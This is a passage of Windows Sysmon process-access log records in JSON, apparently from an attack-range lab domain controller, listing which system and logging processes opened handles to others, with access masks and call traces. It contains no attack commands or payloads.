{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7228,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-0010F9910A00}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-0010F9910A00}","TargetProcessId":"2512","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7229,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00106B930A00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00106B930A00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7230,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00106B930A00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00106B930A00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7231,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.822\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00106B930A00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.822","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00106B930A00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7232,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.900\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-001032970A00}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.900","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-001032970A00}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7233,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.900\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-001032970A00}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.900","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-001032970A00}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7234,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.900\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-001032970A00}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.900","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-001032970A00}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7235,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:02.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:02.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7236,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:03.572\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 